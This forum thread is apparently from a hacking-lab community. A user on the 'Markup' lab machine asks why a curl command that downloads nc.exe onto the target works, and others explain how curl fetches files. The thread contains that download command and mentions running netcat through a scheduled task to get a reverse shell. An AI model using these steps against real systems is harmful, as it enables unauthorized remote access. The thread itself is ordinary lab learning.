Machine: Markup (Starting point) NC.exe has appeared from nowhere how can this be?

Hey forum, clearly I am missing something here. Working through markup and almost rooted it. Next I need to run this:

curl 10.10.10.49/nc.exe -o c:\users\daniel\nc.exe

Before doing so, I check the c:\users\daniel folder to see whats there. There is no nc.exe.

I also searched the filesystem before running the command for nc.exe. Nothing.

Then after running the curl command, nc.exe has appeared in the folder. Where did it come from?

Comments

  • And also on this machine how long does one have to wait for the schedule task to run this?

  • Not only u do the box, many others dooo, may be another player added tht nc.exe

    Ja4V8s28Ck
    Nothing is an Accident, It's Just a part of Destiny

  • edited April 2020

    I have just run the command again and pointed to output to a different folder and sure enough it creates nc.exe in there. I have no doubt that this command is creating nc.exe.

    My question is, where is it getting it from?

  • curl 10.10.10.49/nc.exe -o c:\users\daniel\nc.exe is outputting the result of the cURL command:
    -o, --output <file> Write to file instead of stdout

  • edited April 2020

    Something isnt making sense here. This is the output of the command:

    % Total % Received % Xferd Average Speed Time Time Time Current
    100 1056 0 1056 0 0 1056 0 --:--:-- --:--:-- --:--:-- 11234

    It appears to have downloaded 1056 bytes from somewhere. But where from? Sure enough I can see an nc.exe file that has been created and its 1056 bytes.

    If the nc.exe file is just the output of the curl how can it run? It must be getting the binary for nc.exe from somewhere?

    The next step in the walkthrough is to execute this file as part of a scheduled service to receive a reverse shell.

  • edited April 2020

    @NeoCortex2000 said:
    It appears to have downloaded 1056 bytes from somewhere. But where from? Sure enough I can see an nc.exe file that has been created and its 1056 bytes.

    From here (the first parameter you're passing in to the curl program) :

    10.10.10.49/nc.exe

    Notice that ends with nc.exe? You're telling the curl program to download nc.exe from the machine at 10.10.10.49 and output it in C:\Users\Daniel

    Now I've not looked at this particular machine you're doing and it does seem weird that the machine already has nc.exe on a web server on it, but perhaps that was part of a previous step where you put it there or something. It would make more sense to me if that IP was the IP of your own machine and you had nc.exe on your own web server, but it looks like the IP of a HTB target machine rather than a client machine.

  • Thanks for taking the time to look into this... It didn't seem right to me that I was copying nc.exe into the server from the server that I was on. I couldn't get it to work so I just SCP'd NC.exe from my local machine and it connected right away.

    but good to know that this command would have copied it from my webserver had I been running it and hosting the file.

Sign In to comment.